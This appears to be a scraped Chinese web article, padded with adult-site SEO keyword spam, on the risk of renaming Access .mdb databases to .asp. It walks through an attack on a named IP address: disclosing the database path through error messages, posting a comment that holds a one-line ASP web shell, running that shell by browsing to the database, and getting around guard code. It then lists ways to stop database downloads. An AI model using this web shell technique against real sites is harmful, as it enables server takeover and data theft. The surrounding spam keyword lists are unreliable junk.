婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > access改mdb為asp所帶來的災難 附mdb防下載方法

access改mdb為asp所帶來的災難 附mdb防下載方法
熱門標簽:智能電銷機器人適用于哪些行業 徐州人工智能電銷機器人好用嗎 長沙防封電銷卡品牌 地圖標注服務哪家好 西寧公司外呼系統平臺 騰訊地圖標注商戶關閉 地圖標注宅基地 武漢營銷電話機器人軟件 外呼系統還用卡么
先不說直接改后綴,直接可以用網快等工具直接下載,其實這樣你已經是為入侵者打開了大門。入侵者可以利用asp/asa為后綴的數據庫直接得到webshell。

一.思路

  大家都知道%%>為asp文件的標志符,也就是說一個asp文件只會去執行%%>之間的代碼,access+asp的web系統的所有數據都是存放在數據庫文件里(mdb文件),由于管理者把mdb文件改為了asp文件,如果我們提交的數據里包含有%%>,那當我們訪問這個asp數據庫的時候就會去執行%%>之間的代碼。這樣導致我們只提交惡意代碼給數據庫,那么asp后綴的數據庫就是我們的webshell了。

二.示例

  隨便找個目標,首先我們暴庫,看是不是asp后綴的數據庫:http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5log_id=210


  返回:
復制代碼 代碼如下:

Microsoft VBScript 編譯器錯誤 錯誤 '800a03f6'
缺少 'End'

/iisHelp/common/500-100.asp,行242

Microsoft JET Database Engine 錯誤 '80004005'

'D:\log_mdb\%29dlog_mdb%29.asp'不是一個有效的路徑。 確定路徑名稱拼寫是否正確,以及是否連接到文件存放的服務器。

/test/conn.asp,行18


  我們提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp返回一堆的亂碼,這樣我們可以直接用網際快車等工具直接下載數據庫(這里我們不討論)。我們回到主頁看到有提供“網友評論”功能。我們注冊個用戶,發一條評論:

%execute request("b")%>

  這樣我們就把asp代碼:%execute request("b")%>寫入了數據庫,那么數據庫:就是我們的webshell咯。提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp在亂碼的最后我們看到:

復制代碼 代碼如下:

/iisHelp/common/500-100.asp,行242
Microsoft VBScript 運行時錯誤 錯誤 '800a000d'

類型不匹配: 'execute'

/test/dlog/log_mdb/%29dlog_mdb%29.asp,行1266


  注意:我們在向數據庫提交代碼時,代碼內容不可以太大。所以我們采用%execute request("b")%>。

三.其他一些問題和思路

  1.對于改了后綴為asp,還對數據庫里加入了%='a'-1%>等非法的asp代碼來徹底防止下載的數據庫,由于里面存在了非法的asp代碼,插入我們的webshell代碼后運行,將只會顯示前面非法代碼的錯誤,而不去執行我們shell的代碼。雖然這樣可以防止一定的攻擊,但還是存在一定的隱患,我們只要在出錯的代碼前加入兼容錯誤的代碼,就可以得到正確顯示執行我們插入的webshell代碼了。

  2.對于沒有改后綴的,也就是mdb文件,這樣我們可以先直接下載下來得到后臺密碼,進了后臺,可以利用數據庫備用改后綴為asp。

mdb防下載方法小結

1:在iis6下面 如果一個擴展名沒有被定義則 訪問的時候會出現文件沒有找到的404錯誤。
因此你可以將數據庫任意命名成一個絕對不會出現的文件名就可以達到安全的效果比如:xxxxx.xxxxxxxxxxx


2 將數據庫放在網站的外部,那絕對就不能訪問得到了。例如: e:/web/是你的網站
則把數據庫放在e:/

3 正如樓上所說的 將.mdb 改成 .asp 同時倒入一個特殊的表 包含 % 的二進制字符 這樣訪問文件出現 缺少腳本關閉符的提示。
4 或者將.mdb 改成.asp 同時用winhex打開 可以發現176以后有很長一部分 00 字符串 你隨便在處改成一段asp代碼 也可以實現防止下載,這樣也不影響數據庫功能。例如:
%
response.write("非法訪問")
response.end()
%>


現在在數據庫的名稱里 加上 “#” 和空格 都被破解了 比如“#” = “%35” 而空格 = “%20”

所以說 現在用這些已經不管用了。。


如果是自己的服務器的話就在IIS里設置一下:

新建一個空白的DLL文件,然后在IIS里添加映射,可執行文件選剛才建的這個DLL,擴展名填.mdb,保存后重啟一下IIS服務即可。
您可能感興趣的文章:
  • IIS下防止mdb數據庫被下載的實現方法
  • 九種防MDB數據庫被下載的方法小結

標簽:雅安 通化 通遼 荊門 普洱 巴彥淖爾 運城 鷹潭

巨人網絡通訊聲明:本文標題《access改mdb為asp所帶來的災難 附mdb防下載方法》,本文關鍵詞  access,改,mdb,為,asp,所,帶來,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《access改mdb為asp所帶來的災難 附mdb防下載方法》相關的同類信息!
  • 本頁收集關于access改mdb為asp所帶來的災難 附mdb防下載方法的相關信息資訊供網民參考!
    • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    91福利国产精品| 色诱视频网站一区| 亚洲在线视频网站| 国产精品女上位| 欧美国产欧美综合| 国产精品欧美经典| 亚洲丝袜另类动漫二区| 亚洲日本电影在线| 一区二区国产盗摄色噜噜| 亚洲精品ww久久久久久p站| 亚洲免费av高清| 亚洲一二三四区不卡| 日韩av不卡一区二区| eeuss鲁片一区二区三区在线看| 国产剧情一区二区| 大尺度一区二区| 色综合中文字幕国产 | 99精品视频在线观看免费| 成人福利视频在线| www久久久久| 精品国内二区三区| 亚洲视频免费在线观看| 亚洲一区二区三区激情| 日欧美一区二区| 国产激情视频一区二区在线观看 | 久久久久久亚洲综合| 国产日韩欧美a| 亚洲午夜久久久久久久久久久| 日韩精品久久理论片| 波多野结衣一区二区三区| 本田岬高潮一区二区三区| 91成人在线精品| 欧美成人乱码一区二区三区| 久久久精品免费免费| 亚洲一区在线视频观看| 精品一区二区日韩| 色琪琪一区二区三区亚洲区| 欧美成人高清电影在线| 一区二区三区在线视频播放 | 国产精品丝袜91| 日韩av在线播放中文字幕| a在线播放不卡| 国产三级欧美三级日产三级99 | 东方欧美亚洲色图在线| 91精品国产欧美日韩| 综合电影一区二区三区| 国产乱码精品一区二区三区五月婷| 91网站在线观看视频| 久久久精品日韩欧美| 日韩电影在线免费观看| 色哟哟一区二区三区| 中文字幕精品—区二区四季| 久久精品国产一区二区三| 欧美日韩中字一区| 免费人成精品欧美精品| 色综合久久久久网| 国产色产综合产在线视频| 美女精品自拍一二三四| 欧美精品123区| 亚洲国产综合色| 色素色在线综合| 亚洲私人影院在线观看| 成人h动漫精品| 国产欧美一区二区精品性色超碰| 久久激情综合网| 欧美成人高清电影在线| 青椒成人免费视频| 91精品国产一区二区三区蜜臀| 亚洲高清在线精品| 欧美va亚洲va| 美女性感视频久久| 欧美一级日韩不卡播放免费| 午夜精品久久久久久久久| 欧美日韩另类一区| 一区二区三区日韩在线观看| 在线看不卡av| 亚洲成人av福利| 91精品国产综合久久久久| 视频一区二区三区在线| 精品日韩在线观看| 国产美女在线精品| 中文字幕一区二区三区蜜月| 色999日韩国产欧美一区二区| 亚洲黄色小说网站| 久久亚洲私人国产精品va媚药| 免费在线观看一区| 国产欧美一区二区精品秋霞影院| 国产在线播放一区二区三区 | 一本久道中文字幕精品亚洲嫩| 中文字幕人成不卡一区| 在线一区二区三区四区五区| 亚洲电影视频在线| 精品日韩在线一区| jlzzjlzz国产精品久久| 亚洲综合激情网| 精品对白一区国产伦| 9i在线看片成人免费| 三级影片在线观看欧美日韩一区二区| 日韩欧美一级精品久久| 色88888久久久久久影院野外| 香蕉影视欧美成人| 国产色婷婷亚洲99精品小说| 欧美在线高清视频| 国产酒店精品激情| 午夜亚洲国产au精品一区二区| 日韩午夜激情视频| 色狠狠综合天天综合综合| 免费在线看成人av| 亚洲欧美区自拍先锋| 欧美va天堂va视频va在线| 99精品视频中文字幕| 久久成人免费电影| 亚洲综合另类小说| 国产精品视频麻豆| 欧美一级专区免费大片| 日韩精品专区在线影院观看| www.日韩精品| 韩国午夜理伦三级不卡影院| 一区二区三区在线视频播放| 国产网站一区二区| 欧美一区二区三区白人| 91在线视频免费91| 国产精品一区二区在线观看不卡| 丝袜a∨在线一区二区三区不卡| 欧美国产成人精品| 精品成人一区二区三区四区| 欧美另类videos死尸| 色老汉一区二区三区| 成人一道本在线| 国产精品一二三在| 经典一区二区三区| 捆绑变态av一区二区三区| 国产一区在线看| 久久99精品国产麻豆不卡| 日韩av电影天堂| 天天综合天天综合色| 亚洲一二三区不卡| 一区二区三区精品视频| 亚洲视频在线观看三级| 成人欧美一区二区三区1314| 国产精品久久久久影院| 欧美精品一区二| 久久综合狠狠综合久久激情 | 高清国产午夜精品久久久久久| 捆绑调教一区二区三区| 久久精品国产精品亚洲综合| 日韩高清电影一区| 男女性色大片免费观看一区二区| 成人午夜激情影院| 国产精品123区| 成人va在线观看| 色综合视频在线观看| 91黄色小视频| 欧美美女一区二区三区| 欧美日韩国产小视频| 91精品国产91综合久久蜜臀| 日韩视频免费观看高清完整版 | 美脚の诱脚舐め脚责91| 成人白浆超碰人人人人| 国产精一品亚洲二区在线视频| 精品一区二区三区蜜桃| 国产传媒久久文化传媒| 成人综合在线观看| 在线观看日韩精品| 欧美日韩国产综合一区二区| 欧美一区二区在线播放| 国产亚洲人成网站| 综合av第一页| 日本不卡的三区四区五区| 国产美女在线精品| 在线免费视频一区二区| 91精品视频网| 日本一区二区免费在线观看视频 | 亚洲婷婷在线视频| 午夜久久久久久电影| 捆绑变态av一区二区三区 | 亚洲成人资源在线| 久久99精品国产麻豆不卡| 99精品国产视频| 日韩一区二区视频| 国产精品福利影院| 美女一区二区三区| 9l国产精品久久久久麻豆| 欧美猛男gaygay网站| 中文字幕av一区二区三区高| 一级日本不卡的影视| 国产美女一区二区三区| 欧美三级电影在线看| 久久久精品国产99久久精品芒果| 亚洲免费观看在线视频| 99国产精品久久| 日韩欧美成人一区二区| 亚洲综合另类小说| 成人综合日日夜夜| 欧美一级二级在线观看| 亚洲在线免费播放| 91一区一区三区| 亚洲国产经典视频| 国产最新精品免费| 欧美精品日韩一本|